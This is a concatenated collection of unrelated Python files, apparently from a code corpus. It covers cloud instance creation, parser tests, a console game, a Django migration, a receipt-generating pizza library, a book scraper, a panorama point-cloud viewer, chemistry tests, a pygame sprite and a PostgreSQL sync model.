scope_prompter=self,
compute_client=self.compute_client,
network=args.network,
subnet=args.subnet,
private_network_ip=args.private_network_ip,
no_address=args.no_address,
address=args.address,
instance_refs=instance_refs)
machine_type_uris = instance_utils.CreateMachineTypeUris(
scope_prompter=self,
compute_client=self.compute_client,
project=self.project,
machine_type=args.machine_type,
custom_cpu=args.custom_cpu,
custom_memory=args.custom_memory,
instance_refs=instance_refs)
create_boot_disk = not instance_utils.UseExistingBootDisk(args.disk or [])
if create_boot_disk:
image_uri, _ = self.ExpandImageFlag(args, return_image_resource=False)
else:
image_uri = None
# A list of lists where the element at index i contains a list of
# disk messages that should be set for the instance at index i.
disks_messages = []
# A mapping of zone to boot disk references for all existing boot
# disks that are being attached.
# TODO(user): Simplify this once resources.Resource becomes
# hashable.
existing_boot_disks = {}
for instance_ref in instance_refs:
persistent_disks, boot_disk_ref = (
instance_utils.CreatePersistentAttachedDiskMessages(
self, self.compute_client, self.csek_keys, args.disk or [],
instance_ref))
local_ssds = [
instance_utils.CreateLocalSsdMessage(
self, x.get('device-name'), x.get('interface'), instance_ref.zone)
for x in args.local_ssd or []]
if create_boot_disk:
boot_disk = instance_utils.CreateDefaultBootAttachedDiskMessage(
self, self.compute_client, self.resources,
disk_type=args.boot_disk_type,
disk_device_name=args.boot_disk_device_name,
disk_auto_delete=args.boot_disk_auto_delete,
disk_size_gb=boot_disk_size_gb,
require_csek_key_create=(
args.require_csek_key_create if self.csek_keys else None),
image_uri=image_uri,
instance_ref=instance_ref,
csek_keys=self.csek_keys)
persistent_disks = [boot_disk] + persistent_disks
else:
existing_boot_disks[boot_disk_ref.zone] = boot_disk_ref
disks_messages.append(persistent_disks + local_ssds)
requests = []
for instance_ref, machine_type_uri, disks in zip(
instance_refs, machine_type_uris, disks_messages):
requests.append(self.messages.ComputeInstancesInsertRequest(
instance=self.messages.Instance(
canIpForward=args.can_ip_forward,
disks=disks,
description=args.description,
machineType=machine_type_uri,
metadata=metadata,
name=instance_ref.Name(),
networkInterfaces=[network_interface],
serviceAccounts=service_accounts,
scheduling=scheduling,
tags=tags,
),
project=self.project,
zone=instance_ref.zone))
return requests
Create.detailed_help = DETAILED_HELP
|
nilq/baby-python
|
python
|
from unittest import TestCase
from gui_components import parser
from math import tan
class ParserTestCase(TestCase):
def test_ctan(self):
self.assertEqual(parser.ctan(0.5), 1 / tan(0.5))
def test__check_res(self):
self.assertEqual(parser._check_res('2*x+3', 1), (True, 5))
self.assertEqual(parser._check_res('2*x+vasiles(2)+3', 1), (False, 0))
def test_get_integral_inside_expression(self):
self.assertEqual(parser.get_integral_inside_expression('integrala(2+x)'), '2+x')
self.assertEqual(parser.get_integral_inside_expression('5*x**2'), '')
def test_check_expression_validity(self):
self.assertEqual(parser.check_expression_validity(''), False)
self.assertEqual(parser.check_expression_validity('integrala(2+x)'), True)
self.assertEqual(parser.check_expression_validity('2+x'), True)
self.assertEqual(parser.check_expression_validity('integrala('), False)
self.assertEqual(parser.check_expression_validity('integrala22'), False)
self.assertEqual(parser.check_expression_validity('integrala(22+5+x)'), True)
def test_expr_to_lamda(self):
        current_lambda = lambda x: x * 2
        parser_lambda = parser.expr_to_lamda('x*2')
        self.assertEqual(current_lambda(2), parser_lambda(2))
def test_check_expression_is_number(self):
self.assertTrue(parser.check_expression_is_number('2.5'))
self.assertFalse(parser.check_expression_is_number('vasile'))
|
nilq/baby-python
|
python
|
import random
whi1 = True
while whi1 is True:
try:
print("Selamat Datang Di Game Batu, Gunting, Kertas!")
pilihanAwal = int(input("Apakah Kau Ingin Langsung Bermain?\n1. Mulai Permainan\n2. Tentang Game\n3. Keluar\nPilihan: "))
whi2 = True
while whi2 is True:
if pilihanAwal == 1:
print("=" * 100)
def fungsibgk(pilihan):
komputer = random.choice(["Batu", "Gunting", "Kertas"])
if pilihan == 1:
print("Anda Memilih Batu")
print("Komputer Memilih", komputer)
if komputer == "Batu":
print("Seimbang")
elif komputer == "Gunting":
print("Kau Menang")
elif komputer == "Kertas":
print("Kau Kalah")
elif pilihan == 2:
print("Anda Memilih Gunting")
print("Komputer Memilih", komputer)
if komputer == "Gunting":
print("Seimbang")
elif komputer == "Kertas":
print("Kau Menang")
elif komputer == "Batu":
print("Kau Kalah")
elif pilihan == 3:
print("Anda Memilih Kertas")
print("Komputer Memilih", komputer)
if komputer == "Kertas":
print("Seimbang")
elif komputer == "Batu":
print("Kau Menang")
elif komputer == "Gunting":
print("Kau Kalah")
else:
print("Maaf, Pilihan Anda Tidak Ada Dalam Daftar")
pilihan = int(input("Masukkan Pilihan Anda: \n1. Batu\n2. Gunting\n3. Kertas\nPilihan: "))
print("=" * 100)
fungsibgk(pilihan)
elif pilihanAwal == 2:
print("=" * 100)
print("Created By Aswassaw227\nBuild In Python 3.6")
print("=" * 100)
break
elif pilihanAwal == 3:
print("=" * 100)
print("Terima Kasih Karena Telah Bermain, Semoga Harimu Menyenangkan")
print("=" * 100)
exit()
else:
print("=" * 100)
print("Maaf, Pilihan Anda Tidak Ada Dalam Daftar")
print("=" * 100)
break
except Exception as err:
print("=" * 100)
print(err)
print("=" * 100)
|
nilq/baby-python
|
python
|
# Generated by Django 2.0.13 on 2020-10-10 16:05
import ddcz.models.magic
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ddcz', '0024_skills_name'),
]
operations = [
migrations.AlterField(
model_name='commonarticle',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='gallerypicture',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='monster',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='photo',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='skill',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
]
|
nilq/baby-python
|
python
|
# Copyright (c) 2013 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from oslo_log import log as logging
import six
from patron import keymgr
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class VolumeEncryptor(object):
"""Base class to support encrypted volumes.
A VolumeEncryptor provides hooks for attaching and detaching volumes, which
are called immediately prior to attaching the volume to an instance and
immediately following detaching the volume from an instance. This class
performs no actions for either hook.
"""
def __init__(self, connection_info, **kwargs):
self._key_manager = keymgr.API()
self.encryption_key_id = kwargs.get('encryption_key_id')
def _get_key(self, context):
"""Retrieves the encryption key for the specified volume.
        :param context: the context used to look up the encryption key
"""
return self._key_manager.get_key(context, self.encryption_key_id)
@abc.abstractmethod
def attach_volume(self, context, **kwargs):
"""Hook called immediately prior to attaching a volume to an instance.
"""
pass
@abc.abstractmethod
def detach_volume(self, **kwargs):
"""Hook called immediately after detaching a volume from an instance.
"""
pass
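# A minimal sketch of a concrete subclass (illustrative only; "NoopEncryptor"
# is a hypothetical name, not part of this codebase). It shows how the
# abstract hooks and _get_key() are intended to be used.
class NoopEncryptor(VolumeEncryptor):
    def attach_volume(self, context, **kwargs):
        # Look up the volume's key just before the volume is attached.
        key = self._get_key(context)
        LOG.debug("attach hook called for key id %s", self.encryption_key_id)

    def detach_volume(self, **kwargs):
        LOG.debug("detach hook called")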
|
nilq/baby-python
|
python
|
from .calibration import Calibration
from .capture import Capture
from .configuration import Configuration, default_configuration
from .device import Device
from .image import Image
from .imu_sample import ImuSample
from .transformation import Transformation
|
nilq/baby-python
|
python
|
# some comment
""" doc string """
import math
import sys
class the_class():
# some comment
""" doc string """
import os
import sys
class second_class():
some_statement
import os
import sys
|
nilq/baby-python
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Pizza Project - main.py - started on 8 November 2021
# Written by Garret Stand, licensed under an MIT license for academic use.
# This file contains shell formatting and other output modification/redirection functions for the program. It is a non-executable library.
# Please read the readme if you wish to execute this program locally. Developed on Python 3.9.7
import json
import sys
import os
import random
import uuid
import platform
import argparse
import fpdf
import time
import subprocess
# DEVNOTE: import all external libraries/dependencies above this line, and all internal libraries/dependencies below this line
import argparsing
import dataDriver
import orders
if __name__ == '__main__':
dir_path = os.path.dirname(os.path.realpath(__file__))
print("This is a library. This was probably ran accidentally.\nPlease execute the pizza program from the \"main.py\" program contained in the root of the project (" + dir_path + ") by running \"python3 main.py\", or open it in a text editor/IDE to see its contents and use in the program.")
exit(1)
args = argparsing.returnArgs()
if platform.system() == 'Linux' or platform.system() == 'Darwin': # color initialization for linux/macos, won't work on windows (excerpt from my python library)
red='\033[00;31m'
green='\033[00;32m'
yellow='\033[00;33m'
blue='\033[00;34m'
purple='\033[00;35m'
cyan='\033[00;36m'
lightgray='\033[00;37m'
lred='\033[01;31m'
lgreen='\033[01;32m'
lyellow='\033[01;33m'
lblue='\033[01;34m'
lpurple='\033[01;35m'
lcyan='\033[01;36m'
white='\033[01;37m'
bold='\033[01m'
dim='\033[02m'
blink='\033[05m' # not working/odd behaviour in some terminals but this is known
underlined='\033[04m'
reverse='\033[07m'
passwordhide='\033[08m'
reset='\033[0m'
errorBG='\033[41;30m'
noticeBG='\033[43;30m'
debugBG='\033[47;30m'
else:
red=''
green=''
yellow=''
blue=''
purple=''
cyan=''
lightgray=''
lred=''
lgreen=''
lyellow=''
lblue=''
lpurple=''
lcyan=''
white=''
bold=''
dim=''
blink=''
underlined=''
reverse=''
passwordhide=''
reset=''
errorBG=''
noticeBG=''
indent = u'\U00000009' # unicode tabulation character, for use in printing data structures in debug subroutines and raw data writes when necessary for the data driver (yes i use tabs), or other printing/layout use.
def printError(text, debug=False):
'''
Prints an error to the console with an optional debug check
'''
if debug:
print(errorBG + "[ERROR]" + reset + " " + text) if args.debugFlag else None
else:
print(errorBG + "[ERROR]" + reset + " " + text)
def printNotice(text, debug=False):
'''
Prints a warning to the console with an optional debug check
'''
if debug:
print(noticeBG + "[NOTICE]" + reset + " " + text) if args.debugFlag else None
else:
print(noticeBG + "[NOTICE]" + reset + " " + text)
def printDebug(text):
'''
Prints debug text to the console if the debug flag is set
'''
print(debugBG + "[DEBUG]" + reset + " " + text) if args.debugFlag else None
def clear():
'''
Platform agnostic screen clear
'''
os.system('cls' if os.name == 'nt' else 'clear')
def generateReceipt(order):
'''
Generates a receipt for a given order.
'''
dir_path = os.path.dirname(os.path.realpath(__file__))
configData = dataDriver.loadConfig()
header = '*'
for i in range(len(configData['parlorName'])+8):
header += '*'
header += '''*
* ''' + configData['parlorName'] + ''' *
*'''
for i in range(len(configData['parlorName'])+8):
header += '*'
header += '*'
headerLines = header.splitlines()
receipt = fpdf.FPDF()
receipt.add_page()
receipt.add_font('receiptFont', '', dir_path + '/data/receiptFont.ttf', uni=True)
receipt.set_font("receiptFont", size = 10)
for x in headerLines:
receipt.cell(200, 10, txt=x, ln=1, align='C')
receipt.cell(200, 10, txt="Pizza Receipt", ln=1, align="C")
receipt.cell(200, 10, txt="Time ordered: " + time.ctime(order["time"]), ln=1, align="C")
receipt.cell(200, 10, txt="--", ln=1, align="C")
receipt.cell(200, 10, txt="Order Items:", ln=1, align="C")
subTotal = 0
for pizza in order["pizzas"]:
price = float(0)
if order["pizzas"][pizza]["size"] == "small":
price = price + float(configData["sizeCosts"]["small"])
elif order["pizzas"][pizza]["size"] == "medium":
price = price + float(configData["sizeCosts"]["medium"])
elif order["pizzas"][pizza]["size"] == "large":
price = price + float(configData["sizeCosts"]["large"])
if len(order["pizzas"][pizza]["toppings"]) > 3:
for i in range(3):
price = price + float(configData["toppings<=3"])
for i in range(len(order["pizzas"][pizza]["toppings"]) - 3):
price = price + float(configData["toppings>=4"])
else:
for i in range(len(order["pizzas"][pizza]["toppings"])):
price = price + float(configData["toppings<=3"])
line = "Pizza " + pizza + ": " + order["pizzas"][pizza]["size"] + " pizza with " + "cheese, " + str(order["pizzas"][pizza]["toppings"])[1:len(str(order["pizzas"][pizza]["toppings"]))-1].replace("'", "") + " | $" + "{:.2f}".format(price) if order["pizzas"][pizza]["toppings"] != [''] else "Pizza " + pizza + ": " + order["pizzas"][pizza]["size"] + " pizza with cheese | $" + "{:.2f}".format(price)
receipt.cell(200, 10, txt=line, ln=1, align="L")
subTotal = subTotal + price
receipt.cell(200, 10, txt="Subtotal: $" + "{:.2f}".format(subTotal), ln=1, align="L")
tax = subTotal * float(configData["taxRate"]/100)
receipt.cell(200, 10, txt="Tax: $" + "{:.2f}".format(tax), ln=1, align="L")
total = subTotal + tax
receipt.cell(200, 10, txt="Total: $" + "{:.2f}".format(total), ln=1, align="L")
receipt.cell(200, 10, txt="--", ln=1, align="C")
if order["delivered"] == True:
price = float(configData["deliveryFee"])
receipt.cell(200, 10, txt="Delivery Fee: $" + "{:.2f}".format(price), ln=1, align="L")
if order["deliveryTip"] != None:
price = price + order["deliveryTip"]
receipt.cell(200, 10, txt="Tip: $" + "{:.2f}".format(order["deliveryTip"]), ln=1, align="L")
grandTotal = total + price
else:
receipt.cell(200, 10, txt="Delivery Fee: $0.00 (not delivery)", ln=1, align="L")
grandTotal = total
receipt.cell(200, 10, txt="Grand Total: $" + "{:.2f}".format(grandTotal), ln=1, align="L")
receipt.cell(200, 10, txt="--", ln=1, align="C")
receipt.cell(200, 10, txt="Order info:", ln=1, align="C")
receipt.cell(200, 10, txt="Name: " + order["name"], ln=1, align="L")
if order["delivered"] == True:
receipt.cell(200, 10, txt="Delivery: Yes", ln=1, align="L")
receipt.cell(200, 10, txt="Address: " + order["address"], ln=1, align="L")
else:
receipt.cell(200, 10, txt="Delivery: No", ln=1, align="L")
receipt.cell(200, 10, txt="Address: 123 Parlor St. for pickup", ln=1, align="L")
receipt.cell(200, 10, txt="--", ln=1, align="C")
receipt.cell(200, 10, txt="Thank you for your order!", ln=1, align="C")
receipt.output("receipt.pdf")
print("Receipt generated! Openining in system default PDF viewer...")
subprocess.Popen(["open receipt.pdf"], shell=True) # macOS now at the moment, time constratints :/
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# encoding: utf-8
# Change the str encoding from ascii to utf8 (or gb18030)
import random
import sys
import time
import requests
from bs4 import BeautifulSoup
file_name = 'book_list.txt'
file_content = '' # the content that will eventually be written to the file
file_content += 'Generated at: ' + time.asctime()
headers = [
{'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0'},
{'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'},
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'},
{'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)'},
{'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0'},
{'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/44.0.2403.89 Chrome/44.0.2403.89 Safari/537.36'}
]
def book_spider(book_tag):
global file_content, headers
url = "http://www.douban.com/tag/%s/book" % book_tag
source_code = requests.get(url, headers=random.choice(headers))
    # fetch the page source, rotating through the User-Agent headers
plain_text = source_code.text
    # BeautifulSoup objects can be searched through easily
soup = BeautifulSoup(plain_text)
title_divide = '\n' + '--' * 30 + '\n' + '--' * 30 + '\n'
file_content += title_divide + '\t' * 4 + \
book_tag + ':' + title_divide
count = 1
    # get the soup object for the book list
list_soup = soup.find('div', {'class': 'mod book-list'})
for book_info in list_soup.findAll('dd'):
print('tag: %s, count: %d' % (book_tag, count))
title = book_info.find('a', {'class': 'title'}).string.strip()
desc = book_info.find('div', {'class': 'desc'}).string.strip()
desc_list = desc.split('/')
        author_info = 'Author/Translator: ' + '/'.join(desc_list[0:-3])
        pub_info = 'Publication info: ' + '/'.join(desc_list[-3:])
try:
rating = book_info.find(
'span', {'class': 'rating_nums'}).string.strip()
except AttributeError:
rating = "无"
file_content += "*%d\t《%s》\t评分:%s\n\t%s\n\t%s\n\n" % (
count, title, rating, author_info.strip(), pub_info.strip())
count += 1
def do_spider(book_lists):
for book_tag in book_lists:
book_spider(book_tag)
if __name__ == "__main__":
book_lists = ['心理学', '人物传记', '中国历史', '旅行', '生活', '科普']
do_spider(book_lists)
    # write the final result to the file
f = open(file_name, 'w')
f.write(file_content)
f.close()
|
nilq/baby-python
|
python
|
import numpy as np
from scipy.ndimage import map_coordinates
import open3d
from PIL import Image
from shapely.geometry import Point
from shapely.geometry.polygon import Polygon
import functools
from multiprocessing import Pool
from utils_eval import np_coor2xy, np_coory2v
def xyz_2_coorxy(xs, ys, zs, H, W):
us = np.arctan2(xs, -ys)
vs = -np.arctan(zs / np.sqrt(xs**2 + ys**2))
coorx = (us / (2 * np.pi) + 0.5) * W
coory = (vs / np.pi + 0.5) * H
return coorx, coory
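# Sanity check (plain arithmetic on the formulas above): for an equirectangular
# image with H=512, W=1024, xyz_2_coorxy(0, -1, 0, 512, 1024) returns
# (512.0, 256.0), i.e. that point projects to the image center.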
def pt_in_poly(poly, pt):
return poly.contains(Point(pt))
def warp_walls(xy, floor_z, ceil_z, H, W, ppm, alpha):
all_rgba = []
all_xyz = []
for i in range(len(xy)):
next_i = (i + 1) % len(xy)
xy_a = xy[i]
xy_b = xy[next_i]
xy_w = np.sqrt(((xy_a - xy_b)**2).sum())
t_h = int(round((ceil_z - floor_z) * ppm))
t_w = int(round(xy_w * ppm))
xs = np.linspace(xy_a[0], xy_b[0], t_w)[None].repeat(t_h, 0)
ys = np.linspace(xy_a[1], xy_b[1], t_w)[None].repeat(t_h, 0)
zs = np.linspace(floor_z, ceil_z, t_h)[:, None].repeat(t_w, 1)
coorx, coory = xyz_2_coorxy(xs, ys, zs, H, W)
plane_texture = np.stack([
map_coordinates(equirect_texture[..., 0], [coory, coorx], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 1], [coory, coorx], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 2], [coory, coorx], order=1, mode='wrap'),
np.zeros([t_h, t_w]) + alpha,
], -1)
plane_xyz = np.stack([xs, ys, zs], axis=-1)
all_rgba.extend(plane_texture.reshape(-1, 4))
all_xyz.extend(plane_xyz.reshape(-1, 3))
return all_rgba, all_xyz
def warp_floor_ceiling(xy, z_floor, z_ceiling, H, W, ppm, alpha, n_thread):
min_x = xy[:, 0].min()
max_x = xy[:, 0].max()
min_y = xy[:, 1].min()
max_y = xy[:, 1].max()
t_h = int(round((max_y - min_y) * ppm))
t_w = int(round((max_x - min_x) * ppm))
xs = np.linspace(min_x, max_x, t_w)[None].repeat(t_h, 0)
ys = np.linspace(min_y, max_y, t_h)[:, None].repeat(t_w, 1)
zs_floor = np.zeros_like(xs) + z_floor
zs_ceil = np.zeros_like(xs) + z_ceiling
coorx_floor, coory_floor = xyz_2_coorxy(xs, ys, zs_floor, H, W)
coorx_ceil, coory_ceil = xyz_2_coorxy(xs, ys, zs_ceil, H, W)
floor_texture = np.stack([
map_coordinates(equirect_texture[..., 0], [coory_floor, coorx_floor], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 1], [coory_floor, coorx_floor], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 2], [coory_floor, coorx_floor], order=1, mode='wrap'),
np.zeros([t_h, t_w]) + alpha,
], -1).reshape(-1, 4)
floor_xyz = np.stack([xs, ys, zs_floor], axis=-1).reshape(-1, 3)
ceil_texture = np.stack([
map_coordinates(equirect_texture[..., 0], [coory_ceil, coorx_ceil], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 1], [coory_ceil, coorx_ceil], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 2], [coory_ceil, coorx_ceil], order=1, mode='wrap'),
np.zeros([t_h, t_w]) + alpha,
], -1).reshape(-1, 4)
ceil_xyz = np.stack([xs, ys, zs_ceil], axis=-1).reshape(-1, 3)
xy_poly = Polygon(xy)
with Pool(n_thread) as p:
sel = p.map(functools.partial(pt_in_poly, xy_poly), floor_xyz[:, :2])
return floor_texture[sel], floor_xyz[sel], ceil_texture[sel], ceil_xyz[sel]
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--img', default='assert/output_preprocess/demo_aligned_rgb.png',
help='Image texture in equirectangular format')
parser.add_argument('--layout', default='assert/output/demo_aligned_rgb_cor_id.txt',
help='Txt file containing layout corners (cor_id)')
parser.add_argument('--camera_height', default=1.6, type=float,
help='Camera height in meter (not the viewer camera)')
parser.add_argument('--ppm', default=120, type=int,
help='Points per meter')
    parser.add_argument('--point_size', default=0.0025, type=float,
                        help='Point size')
parser.add_argument('--alpha', default=1.0, type=float,
help='Opacity of the texture')
parser.add_argument('--threads', default=10, type=int,
help='Number of threads to use')
parser.add_argument('--ignore_floor', action='store_true',
help='Skip rendering floor')
parser.add_argument('--ignore_ceiling', action='store_true',
help='Skip rendering ceiling')
args = parser.parse_args()
# Reading source (texture img, cor_id txt)
equirect_texture = np.array(Image.open(args.img)) / 255.0
with open(args.layout) as f:
cor_id = np.array([line.split() for line in f], np.float32)
# Convert cor_id to 3d xyz
N = len(cor_id) // 2
H, W = equirect_texture.shape[:2]
floor_z = -args.camera_height
floor_xy = np_coor2xy(cor_id[1::2], floor_z, W, H)
c = np.sqrt((floor_xy**2).sum(1))
v = np_coory2v(cor_id[0::2, 1], H)
ceil_z = (c * np.tan(v)).mean()
# Warp each wall
all_rgba, all_xyz = warp_walls(floor_xy, floor_z, ceil_z, H, W, args.ppm, args.alpha)
# Warp floor and ceiling
if not args.ignore_floor or not args.ignore_ceiling:
fi, fp, ci, cp = warp_floor_ceiling(floor_xy, floor_z, ceil_z, H, W,
ppm=args.ppm,
alpha=args.alpha,
n_thread=args.threads)
if not args.ignore_floor:
all_rgba.extend(fi)
all_xyz.extend(fp)
if not args.ignore_ceiling:
all_rgba.extend(ci)
all_xyz.extend(cp)
# Launch point cloud viewer
print('# of points:', len(all_rgba))
all_xyz = np.array(all_xyz)
all_rgb = np.array(all_rgba)[:, :3]
pcd = open3d.PointCloud()
pcd.points = open3d.Vector3dVector(all_xyz)
pcd.colors = open3d.Vector3dVector(all_rgb)
open3d.draw_geometries([pcd])
|
nilq/baby-python
|
python
|
import pytest
from openeye import oechem
from openff.recharge.aromaticity import AromaticityModel, AromaticityModels
from openff.recharge.utilities.openeye import smiles_to_molecule
@pytest.mark.parametrize(
"smiles",
[
"c1ccccc1", # benzene
"c1ccc2ccccc2c1", # napthelene
"c1ccc2c(c1)ccc3ccccc23", # phenanthrene
"c1ccc2c(c1)ccc3c4ccccc4ccc23", # chrysene
"c1cc2ccc3cccc4ccc(c1)c2c34", # pyrene
"c1cc2ccc3ccc4ccc5ccc6ccc1c7c2c3c4c5c67", # coronene
"Cc1ccc2cc3ccc(C)cc3cc2c1", # 2,7-Dimethylanthracene
],
)
def test_am1_bcc_aromaticity_simple(smiles):
"""Checks that the custom AM1BCC aromaticity model behaves as
expected for simple fused hydrocarbons.
"""
oe_molecule = smiles_to_molecule(smiles)
AromaticityModel.assign(oe_molecule, AromaticityModels.AM1BCC)
ring_carbons = [
atom
for atom in oe_molecule.GetAtoms()
if atom.GetAtomicNum() == 6 and oechem.OEAtomIsInRingSize(atom, 6)
]
ring_indices = {atom.GetIdx() for atom in ring_carbons}
assert all(atom.IsAromatic() for atom in ring_carbons)
assert all(
bond.IsAromatic()
for bond in oe_molecule.GetBonds()
if bond.GetBgnIdx() in ring_indices and bond.GetEndIdx() in ring_indices
)
def test_am1_bcc_aromaticity_ring_size():
"""Checks that the custom AM1BCC aromaticity model behaves as
expected fused hydrocarbons with varying ring sizes"""
oe_molecule = smiles_to_molecule("C1CC2=CC=CC3=C2C1=CC=C3")
AromaticityModel.assign(oe_molecule, AromaticityModels.AM1BCC)
atoms = {atom.GetIdx(): atom for atom in oe_molecule.GetAtoms()}
assert [not atoms[index].IsAromatic() for index in range(2)]
assert [atoms[index].IsAromatic() for index in range(2, 12)]
@pytest.mark.parametrize(
"aromaticity_model",
[AromaticityModels.AM1BCC, AromaticityModels.MDL],
)
def test_aromaticity_models(aromaticity_model):
oe_molecule = smiles_to_molecule("C")
AromaticityModel.assign(oe_molecule, aromaticity_model)
|
nilq/baby-python
|
python
|
import pygame, math, os, time
from .Torpedo import Torpedo
from .Explosion import Explosion
FRICTION_COEFF = 1 - 0.015
class Spaceship(pygame.sprite.Sprite):
def __init__(self, colour, img_path, bearing, torpedo_group, explosion_group):
super().__init__()
self.torpedo_group = torpedo_group
self.explosion_group = explosion_group
self.colour = colour
self.last_shoot = 0
self.shoot_delay = 0.9
self.raw_image = pygame.image.load(
os.path.join("assets", "spaceships", img_path)
)
self.raw_image = pygame.transform.scale(self.raw_image, (64, 64))
self.image = self.raw_image
self.rect = self.image.get_rect()
self.rect.x = 0
self.rect.y = 0
self.x_vel = 0
self.y_vel = 0
self.power = {"engines": 0, "shields": 0, "weapons": 0}
self.bearing = {"engines": bearing, "shields": 0, "weapons": 0}
self.active = {"engines": False, "shields": False, "weapons": False}
self.health = 100
def update(self):
# print("{col} health is {health}".format(col=self.colour,health=self.health))
        if self.health < 0:
# print("{me} has now died".format(me=self.colour))
self.kill()
self.explosion_group.add(Explosion(self.colour, self.rect.x, self.rect.y))
return
self.bearing["engines"] = self.bearing["engines"] % 360
self.bearing["shields"] = self.bearing["shields"] % 360
self.bearing["weapons"] = self.bearing["weapons"] % 360
self.rect.x += self.x_vel
self.rect.y += self.y_vel
self.x_vel *= FRICTION_COEFF
self.y_vel *= FRICTION_COEFF
if self.active["engines"]:
self.x_vel -= (
math.sin(math.radians(self.bearing["engines"])) * self.power["engines"]
)
self.y_vel -= (
math.cos(math.radians(self.bearing["engines"])) * self.power["engines"]
)
self.image, self.rect = Spaceship.rotate(
self.raw_image, self.rect, self.bearing["engines"]
)
if (self.rect.y < 0 and self.y_vel < 0) or (
self.rect.y > 1080 - self.image.get_height() and self.y_vel > 0
):
self.y_vel = -self.y_vel
if (self.rect.x < 0 and self.x_vel < 0) or (
self.rect.x > (1920 - 378) - self.image.get_width() and self.x_vel > 0
):
self.x_vel = -self.x_vel
if self.active["weapons"] and time.time() > self.last_shoot + (self.shoot_delay/(self.power["weapons"]/65 + 0.1)):
self.shoot()
self.last_shoot = time.time()
def shoot(self):
self.torpedo_group.add(Torpedo(self.colour,self.bearing["weapons"],self.rect.x,self.rect.y,self.x_vel,self.y_vel))
@staticmethod
def rotate(image, rect, angle):
"""Rotate the image while keeping its center."""
# Rotate the original image without modifying it.
new_image = pygame.transform.rotate(image, angle)
# Get a new rect with the center of the old rect.
rect = new_image.get_rect(center=rect.center)
return new_image, rect
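# Note on the design choice: pygame.transform.rotate returns a new surface
# whose bounding box grows for non-right-angle rotations (a 64x64 sprite
# rotated 45 degrees comes back roughly 90x90), so re-centering the new rect
# on the old one is what keeps the ship anchored at the same point on screen.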
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
from datetime import datetime
class SyncModel:
""" Implements common methods used by the models for syncing data into database.
    currently the following models use this: Companies, Contacts, Departments, Events,
Invoices, Projects, Users."""
    def __init__(self, db_params: dict, table_names: dict):
        self.name = 'syncmodel'
def table_name(self):
return self.table
def status(self):
return {
'database_table': self.table_name(),
'synced_entries': self.count(),
'last_modified': self.max_last_modified_timestamp()
}
def truncate_table(self):
self.postgresql_wrapper.execute(
f'TRUNCATE TABLE {self.table};'
)
def count_sql(self):
return f'SELECT COUNT(*) FROM {self.table}'
def max_last_modified_sql(self):
return f'SELECT max(updated_at) FROM {self.table}'
def max_last_modified_timestamp(self) -> datetime:
"""Returns the highest ldap_modifytimestamp"""
return self.postgresql_wrapper.execute(
self.max_last_modified_sql()
)[0][0]
def count(self) -> int:
return self.postgresql_wrapper.execute(self.count_sql())[0][0]
# customize these below methods in the classes where we want different or additional columns.
@classmethod
def create_table_sql(cls, table_name):
return f'''CREATE TABLE IF NOT EXISTS {table_name}(
id serial PRIMARY KEY,
tl_uuid uuid NOT NULL,
tl_content jsonb NOT NULL,
tl_type VARCHAR,
created_at timestamp with time zone NOT NULL DEFAULT now(),
updated_at timestamp with time zone NOT NULL DEFAULT now(),
CONSTRAINT {table_name.replace(".","_")}_constraint_key UNIQUE (tl_uuid)
);
'''
# selects a page of data from our models database table
def select_page(self, limit=0, offset=0):
return self.postgresql_wrapper.execute(
f'''
SELECT * from {self.table} ORDER BY id LIMIT %s OFFSET %s
''',
(limit, offset)
)
def upsert_entities_sql(self):
return f'''INSERT INTO {self.table} (
tl_uuid,
tl_type,
tl_content)
VALUES (%s, %s, %s) ON CONFLICT (tl_uuid) DO
UPDATE
SET tl_content = EXCLUDED.tl_content,
tl_type = EXCLUDED.tl_type,
updated_at = now();
'''
def _prepare_vars_upsert(self, teamleader_result, tl_type: str) -> tuple:
"""Transforms teamleader entry to pass to the psycopg2 execute function.
Transform it to a tuple containing the parameters to be able to upsert.
"""
return (
str(teamleader_result['id']),
tl_type,
json.dumps(teamleader_result)
)
def upsert_results(self, teamleader_results: list):
"""Upsert the teamleader entries into PostgreSQL.
Transforms and flattens the teamleader entries to one list,
